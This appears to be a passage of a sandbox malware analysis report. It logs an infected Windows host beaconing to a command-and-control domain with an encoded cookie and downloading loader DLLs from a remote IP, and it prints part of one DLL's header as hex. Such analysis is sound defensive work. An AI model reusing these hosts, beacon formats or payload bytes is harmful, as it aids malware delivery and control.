    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 64.227.108.27:80

    Networking

    barindex
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 64.227.108.27 80
    Source: C:\Windows\System32\rundll32.exeDomain query: alexbionka.com
    Source: Malware configuration extractorURLs: alexbionka.com
    Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3570055661:1:6727:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323834393932:416C627573:31463945303738373942323239343237; __io=0; _gid=67AFEDC5AC03Host: alexbionka.com
    Source: Joe Sandbox ViewIP Address: 64.227.108.27 64.227.108.27
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 11 Aug 2022 15:38:26 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34X-Powered-By: PHP/7.2.34Content-Description: File TransferContent-Disposition: attachment; filename="loader_p3_dll_64_n3_crypt_x64_asm_clone_n14.dll"Expires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 360448Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 55 ef 34 c3 11 8e 5a 90 11 8e 5a 90 11 8e 5a 90 02 e9 59 91 10 8e 5a 90 59 e0 5a 91 10 8e 5a 90 33 e6 a5 90 10 8e 5a 90 6a e1 58 91 10 8e 5a 90 52 69 63 68 11 8e 5a 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 59 d1 f4 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 0e 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 0a 00 06 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 91 9d 05 00 03 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 05 00 7d 01 00 00 00 00 00 00 00 00 00 00 00 a0 05 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 77 05 00 00 10 00 00 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7d 01 00 00 00 90 05 00 00 02 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 a0 05 00 00 02 00 00 00 7e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.8.146.139Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Aug 2022 15:38:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 63 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 78 62 69 6f 6e 6b 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: rundll32.exe, 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146
    Source: r9093.tmp.exe, 00000004.00000002.944568894.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_c
